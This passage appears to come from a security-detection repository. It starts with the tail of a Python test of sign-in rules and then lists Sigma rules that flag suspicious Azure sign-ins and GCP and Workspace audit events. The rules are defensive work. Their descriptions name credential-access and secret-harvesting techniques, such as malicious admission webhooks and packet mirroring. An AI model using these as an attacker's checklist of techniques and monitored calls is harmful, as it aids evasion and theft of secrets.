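    {"id": 5, "Status": "Failure", "AuthenticationRequirement": "singleFactorAuthentication",
     "RiskState": "none", "DeviceDetail": {}, "userAgent": "bav2ropc"},
]


def matching_ids(rule, events=EVENTS):
    """Return the ids of the events a rule fires on."""
    return [e["id"] for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    print("risky sign-in from unregistered device:", matching_ids(RISKY_UNREGISTERED))  # [1, 2]
    print("legacy client MFA bypass:", matching_ids(LEGACY_CLIENT_MFA_BYPASS))          # [4]
```

Event 2 is the case that silently disappears if a backend translates `DeviceDetail.trusttype: null` as an equality against an empty string: the field is absent, not empty, and only the `null` selection catches it. Event 5 shows why the legacy-client rule keys on `Status: 'Success'` as well as the user agent: a failed ROPC attempt is a password-spray signal, not an MFA bypass.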
  {
    "path": "rules/cloud/azure/signin_logs/azure_app_device_code_authentication.yml",
    "content": "title: Application Using Device Code Authentication Flow\nid: 248649b7-d64f-46f0-9fb2-a52774166fb5\nstatus: test\ndescription: |\n    Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\n    If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\n    This can be a misconfigured application or potentially something malicious.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-06-01\ntags:\n    - attack.t1078\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        properties.message: Device Code\n    condition: selection\nfalsepositives:\n    - Applications that are input constrained will need to use device code flow and are valid authentications.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_app_ropc_authentication.yml",
    "content": "title: Applications That Are Using ROPC Authentication Flow\nid: 55695bc0-c8cf-461f-a379-2535f563c854\nstatus: test\ndescription: |\n    Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\n    The application then uses those credentials to authenticate the user against the identity provider.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-06-01\ntags:\n    - attack.t1078\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        properties.message: ROPC\n    condition: selection\nfalsepositives:\n    - Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_blocked_account_attempt.yml",
    "content": "title: Account Disabled or Blocked for Sign in Attempts\nid: 4afac85c-224a-4dd7-b1af-8da40e1c60bd\nstatus: test\ndescription: Detects when an account is disabled or blocked for sign in but tried to log in\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts\nauthor: Yochana Henderson, '@Yochana-H'\ndate: 2022-06-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 50057\n        ResultDescription: Failure\n    condition: selection\nfalsepositives:\n    - Account disabled or blocked in error\n    - Automation account has been blocked or disabled\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_conditional_access_failure.yml",
    "content": "title: Sign-in Failure Due to Conditional Access Requirements Not Met\nid: b4a6d707-9430-4f5f-af68-0337f52d5c42\nstatus: test\ndescription: Define a baseline threshold for failed sign-ins due to Conditional Access failures\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts\nauthor: Yochana Henderson, '@Yochana-H'\ndate: 2022-06-01\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1110\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 53003\n        ResultDescription: Blocked by Conditional Access\n    condition: selection\nfalsepositives:\n    - Service Account misconfigured\n    - Misconfigured Systems\n    - Vulnerability Scanners\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_legacy_authentication_protocols.yml",
    "content": "title: Use of Legacy Authentication Protocols\nid: 60f6535a-760f-42a9-be3f-c9a0a025906e\nstatus: test\ndescription: Alert on when legacy authentication has been used on an account\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts\nauthor: Yochana Henderson, '@Yochana-H'\ndate: 2022-06-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ActivityDetails: Sign-ins\n        ClientApp:\n            - Other client\n            - IMAP\n            - POP3\n            - MAPI\n            - SMTP\n            - Exchange ActiveSync\n            - Exchange Web Services\n        Username: 'UPN'\n    condition: selection\nfalsepositives:\n    - User has been put in an exception group so they can use legacy authentication\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_login_to_disabled_account.yml",
    "content": "title: Login to Disabled Account\nid: 908655e0-25cf-4ae1-b775-1c8ce9cf43d8\nstatus: test\ndescription: Detect failed attempts to sign in to disabled accounts.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: AlertIQ\ndate: 2021-10-10\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 50057\n        ResultDescription: 'User account is disabled. The account has been disabled by an administrator.'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_mfa_denies.yml",
    "content": "title: Multifactor Authentication Denied\nid: e40f4962-b02b-4192-9bfe-245f7ece1f99\nstatus: test\ndescription: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/\nauthor: AlertIQ\ndate: 2022-03-24\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\n    - attack.t1621\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        AuthenticationRequirement: 'multiFactorAuthentication'\n        Status|contains: 'MFA Denied'\n    condition: selection\nfalsepositives:\n    - Users who are actually logging in but mis-click the Deny button on the MFA prompt.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_mfa_interrupted.yml",
    "content": "title: Multifactor Authentication Interrupted\nid: 5496ff55-42ec-4369-81cb-00f417029e25\nstatus: test\ndescription: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: AlertIQ\ndate: 2021-10-10\nmodified: 2022-12-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\n    - attack.t1621\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection_50074:\n        ResultType: 50074\n        ResultDescription|contains: 'Strong Auth required'\n    selection_500121:\n        ResultType: 500121\n        ResultDescription|contains: 'Authentication failed during strong authentication request'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_unusual_authentication_interruption.yml",
    "content": "title: Azure Unusual Authentication Interruption\nid: 8366030e-7216-476b-9927-271d79f13cf3\nstatus: test\ndescription: Detects when there is an interruption in the authentication process.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: Austin Songer @austinsonger\ndate: 2021-11-26\nmodified: 2022-12-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection_50097:\n        ResultType: 50097\n        ResultDescription: 'Device authentication is required'\n    selection_50155:\n        ResultType: 50155\n        ResultDescription: 'DeviceAuthenticationFailed'\n    selection_50158:\n        ResultType: 50158\n        ResultDescription: 'ExternalSecurityChallenge - External security challenge was not satisfied'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_user_login_blocked_by_conditional_access.yml",
    "content": "title: User Access Blocked by Azure Conditional Access\nid: 9a60e676-26ac-44c3-814b-0c2a8b977adf\nstatus: test\ndescription: |\n    Detect access has been blocked by Conditional Access policies.\n    The access policy does not allow token issuance, which might be a sign of unauthorized login to valid accounts.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: AlertIQ\ndate: 2021-10-10\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.initial-access\n    - attack.t1110\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 53003\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_users_authenticating_to_other_azure_ad_tenants.yml",
    "content": "title: Users Authenticating To Other Azure AD Tenants\nid: 5f521e4b-0105-4b72-845b-2198a54487b9\nstatus: test\ndescription: Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-06-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n        HomeTenantId: 'HomeTenantID'\n    filter:\n        ResourceTenantId|contains: 'HomeTenantID'\n    condition: selection and not filter\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_access_policy_deleted.yml",
    "content": "title: GCP Access Policy Deleted\nid: 32438676-1dba-4ac7-bf69-b86cba995e05\nstatus: test\ndescription: |\n    Detects when an access policy that is applied to a GCP cloud resource is deleted.\n    An adversary would be able to remove access policies to gain access to a GCP cloud resource.\nreferences:\n    - https://cloud.google.com/access-context-manager/docs/audit-logging\n    - https://cloud.google.com/logging/docs/audit/understanding-audit-logs\n    - https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog\nauthor: Bryan Lim\ndate: 2024-01-12\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        data.protoPayload.authorizationInfo.permission:\n            - 'accesscontextmanager.accessPolicies.delete'\n            - 'accesscontextmanager.accessPolicies.accessLevels.delete'\n            - 'accesscontextmanager.accessPolicies.accessZones.delete'\n            - 'accesscontextmanager.accessPolicies.authorizedOrgsDescs.delete'\n        data.protoPayload.authorizationInfo.granted: 'true'\n        data.protoPayload.serviceName: 'accesscontextmanager.googleapis.com'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_breakglass_container_workload_deployed.yml",
    "content": "title: GCP Break-glass Container Workload Deployed\nid: 76737c19-66ee-4c07-b65a-a03301d1573d\nstatus: test\ndescription: |\n    Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.\nreferences:\n    - https://cloud.google.com/binary-authorization\nauthor: Bryan Lim\ndate: 2024-01-12\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        data.protoPayload.resource.type: 'k8s_cluster'\n        data.protoPayload.logName:\n            - 'cloudaudit.googleapis.com/activity'\n            - 'cloudaudit.googleapis.com%2Factivity'\n        data.protoPayload.methodName: 'io.k8s.core.v1.pods.create'\n    keywords:\n        - 'image-policy.k8s.io/break-glass'\n    condition: selection and keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_bucket_enumeration.yml",
    "content": "title: Google Cloud Storage Buckets Enumeration\nid: e2feb918-4e77-4608-9697-990a1aaf74c3\nstatus: test\ndescription: Detects when a storage bucket is enumerated in Google Cloud.\nreferences:\n    - https://cloud.google.com/storage/docs/json_api/v1/buckets\nauthor: Austin Songer @austinsonger\ndate: 2021-08-14\nmodified: 2022-10-09\ntags:\n    - attack.discovery\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - storage.buckets.list\n            - storage.buckets.listChannels\n    condition: selection\nfalsepositives:\n    - Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_bucket_modified_or_deleted.yml",
    "content": "title: Google Cloud Storage Buckets Modified or Deleted\nid: 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0\nstatus: test\ndescription: Detects when a storage bucket is modified or deleted in Google Cloud.\nreferences:\n    - https://cloud.google.com/storage/docs/json_api/v1/buckets\nauthor: Austin Songer @austinsonger\ndate: 2021-08-14\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - storage.buckets.delete\n            - storage.buckets.insert\n            - storage.buckets.update\n            - storage.buckets.patch\n    condition: selection\nfalsepositives:\n    - Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_dlp_re_identifies_sensitive_information.yml",
    "content": "title: Google Cloud Re-identifies Sensitive Information\nid: 234f9f48-904b-4736-a34c-55d23919e4b7\nstatus: test\ndescription: Identifies when sensitive information is re-identified in Google Cloud.\nreferences:\n    - https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify\nauthor: Austin Songer @austinsonger\ndate: 2021-08-15\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1565\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name: projects.content.reidentify\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_dns_zone_modified_or_deleted.yml",
    "content": "title: Google Cloud DNS Zone Modified or Deleted\nid: 28268a8f-191f-4c17-85b2-f5aa4fa829c3\nstatus: test\ndescription: Identifies when a DNS Zone is modified or deleted in Google Cloud.\nreferences:\n    - https://cloud.google.com/dns/docs/reference/v1/managedZones\nauthor: Austin Songer @austinsonger\ndate: 2021-08-15\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - Dns.ManagedZones.Delete\n            - Dns.ManagedZones.Update\n            - Dns.ManagedZones.Patch\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml",
    "content": "title: Google Cloud Firewall Modified or Deleted\nid: fe513c69-734c-4d4a-8548-ac5f609be82b\nstatus: test\ndescription: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).\nreferences:\n    - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging\n    - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-13\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - v*.Compute.Firewalls.Delete\n            - v*.Compute.Firewalls.Patch\n            - v*.Compute.Firewalls.Update\n            - v*.Compute.Firewalls.Insert\n    condition: selection\nfalsepositives:\n    - Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.\n    - Exceptions can be added to this rule to filter expected behavior.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_full_network_traffic_packet_capture.yml",
    "content": "title: Google Full Network Traffic Packet Capture\nid: 980a7598-1e7f-4962-9372-2d754c930d0e\nstatus: test\ndescription: Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.\nreferences:\n    - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging\n    - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-13\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1074\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - v*.Compute.PacketMirrorings.Get\n            - v*.Compute.PacketMirrorings.Delete\n            - v*.Compute.PacketMirrorings.Insert\n            - v*.Compute.PacketMirrorings.Patch\n            - v*.Compute.PacketMirrorings.List\n            - v*.Compute.PacketMirrorings.aggregatedList\n    condition: selection\nfalsepositives:\n    - Full Network Packet Capture may be done by a system or network administrator.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_kubernetes_admission_controller.yml",
    "content": "title: Google Cloud Kubernetes Admission Controller\nid: 6ad91e31-53df-4826-bd27-0166171c8040\nstatus: test\ndescription: |\n  Identifies when an admission controller is executed in GCP Kubernetes.\n  A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\n  The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\n  An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\n  For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\n  An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\nreferences:\n    - https://cloud.google.com/kubernetes-engine/docs\nauthor: Austin Songer @austinsonger\ndate: 2021-11-25\nmodified: 2022-12-18\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1078\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.007\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name|startswith: 'admissionregistration.k8s.io.v'\n        gcp.audit.method_name|contains:\n            - '.mutatingwebhookconfigurations.'\n            - '.validatingwebhookconfigurations.'\n        gcp.audit.method_name|endswith:\n            - 'create'\n            - 'patch'\n            - 'replace'\n    condition: selection\nfalsepositives:\n    - Google Cloud Kubernetes Admission Controller may be done by a system administrator.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_kubernetes_cronjob.yml",
    "content": "title: Google Cloud Kubernetes CronJob\nid: cd3a808c-c7b7-4c50-a2f3-f4cfcd436435\nstatus: test\ndescription: |\n    Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\n    Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\n    An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\nreferences:\n    - https://cloud.google.com/kubernetes-engine/docs\n    - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/\n    - https://kubernetes.io/docs/concepts/workloads/controllers/job/\nauthor: Austin Songer @austinsonger\ndate: 2021-11-22\nmodified: 2022-12-25\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.execution\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - io.k8s.api.batch.v*.Job\n            - io.k8s.api.batch.v*.CronJob\n    condition: selection\nfalsepositives:\n    - Google Cloud Kubernetes CronJob/Job may be done by a system administrator.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_kubernetes_rolebinding.yml",
    "content": "title: Google Cloud Kubernetes RoleBinding\nid: 0322d9f2-289a-47c2-b5e1-b63c90901a3e\nstatus: test\ndescription: Detects the creation or patching of potentially malicious RoleBindings. This includes RoleBindings and ClusterRoleBindings.\nreferences:\n    - https://github.com/elastic/detection-rules/pull/1267\n    - https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole\n    - https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control\n    - https://kubernetes.io/docs/reference/access-authn-authz/rbac/\n    - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging\nauthor: Austin Songer @austinsonger\ndate: 2021-08-09\nmodified: 2022-10-09\ntags:\n    - attack.credential-access\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - io.k8s.authorization.rbac.v*.clusterrolebindings.create\n            - io.k8s.authorization.rbac.v*.rolebindings.create\n            - io.k8s.authorization.rbac.v*.clusterrolebindings.patch\n            - io.k8s.authorization.rbac.v*.rolebindings.patch\n            - io.k8s.authorization.rbac.v*.clusterrolebindings.update\n            - io.k8s.authorization.rbac.v*.rolebindings.update\n            - io.k8s.authorization.rbac.v*.clusterrolebindings.delete\n            - io.k8s.authorization.rbac.v*.rolebindings.delete\n    condition: selection\nfalsepositives:\n    - RoleBindings and ClusterRoleBindings being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - RoleBindings and ClusterRoleBindings modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_kubernetes_secrets_modified_or_deleted.yml",
    "content": "title: Google Cloud Kubernetes Secrets Modified or Deleted\nid: 2f0bae2d-bf20-4465-be86-1311addebaa3\nstatus: test\ndescription: Identifies when the Secrets are Modified or Deleted.\nreferences:\n    - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging\nauthor: Austin Songer @austinsonger\ndate: 2021-08-09\nmodified: 2022-10-09\ntags:\n    - attack.credential-access\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - io.k8s.core.v*.secrets.create\n            - io.k8s.core.v*.secrets.update\n            - io.k8s.core.v*.secrets.patch\n            - io.k8s.core.v*.secrets.delete\n    condition: selection\nfalsepositives:\n    - Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_service_account_disabled_or_deleted.yml",
    "content": "title: Google Cloud Service Account Disabled or Deleted\nid: 13f81a90-a69c-4fab-8f07-b5bb55416a9f\nstatus: test\ndescription: Identifies when a service account is disabled or deleted in Google Cloud.\nreferences:\n    - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts\nauthor: Austin Songer @austinsonger\ndate: 2021-08-14\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name|endswith:\n            - .serviceAccounts.disable\n            - .serviceAccounts.delete\n    condition: selection\nfalsepositives:\n    - Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_service_account_modified.yml",
    "content": "title: Google Cloud Service Account Modified\nid: 6b67c12e-5e40-47c6-b3b0-1e6b571184cc\nstatus: test\ndescription: Identifies when a service account is modified in Google Cloud.\nreferences:\n    - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts\nauthor: Austin Songer @austinsonger\ndate: 2021-08-14\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name|endswith:\n            - .serviceAccounts.patch\n            - .serviceAccounts.create\n            - .serviceAccounts.update\n            - .serviceAccounts.enable\n            - .serviceAccounts.undelete\n    condition: selection\nfalsepositives:\n    - Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_sql_database_modified_or_deleted.yml",
    "content": "title: Google Cloud SQL Database Modified or Deleted\nid: f346bbd5-2c4e-4789-a221-72de7685090d\nstatus: test\ndescription: Detects when a Cloud SQL DB has been modified or deleted.\nreferences:\n    - https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update\nauthor: Austin Songer @austinsonger\ndate: 2021-10-15\nmodified: 2022-12-25\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - cloudsql.instances.create\n            - cloudsql.instances.delete\n            - cloudsql.users.update\n            - cloudsql.users.delete\n    condition: selection\nfalsepositives:\n    - SQL Database being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_vpn_tunnel_modified_or_deleted.yml",
    "content": "title: Google Cloud VPN Tunnel Modified or Deleted\nid: 99980a85-3a61-43d3-ac0f-b68d6b4797b1\nstatus: test\ndescription: Identifies when a VPN Tunnel is modified or deleted in Google Cloud.\nreferences:\n    - https://any-api.com/googleapis_com/compute/docs/vpnTunnels\nauthor: Austin Songer @austinsonger\ndate: 2021-08-16\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - compute.vpnTunnels.insert\n            - compute.vpnTunnels.delete\n    condition: selection\nfalsepositives:\n    - VPN Tunnel being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_application_access_levels_modified.yml",
    "content": "title: Google Workspace Application Access Level Modified\nid: 22f2fb54-5312-435d-852f-7c74f81684ca\nstatus: test\ndescription: |\n    Detects when an access level is changed for a Google workspace application.\n    An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model.\n    An adversary would be able to remove access levels to gain easier access to Google workspace resources.\nreferences:\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings\n    - https://support.google.com/a/answer/9261439\nauthor: Bryan Lim\ndate: 2024-01-12\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098.003\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: 'admin.googleapis.com'\n        eventName: 'CHANGE_APPLICATION_SETTING'\n        setting_name|startswith: 'ContextAwareAccess'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activities changing the access levels for an application\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_application_removed.yml",
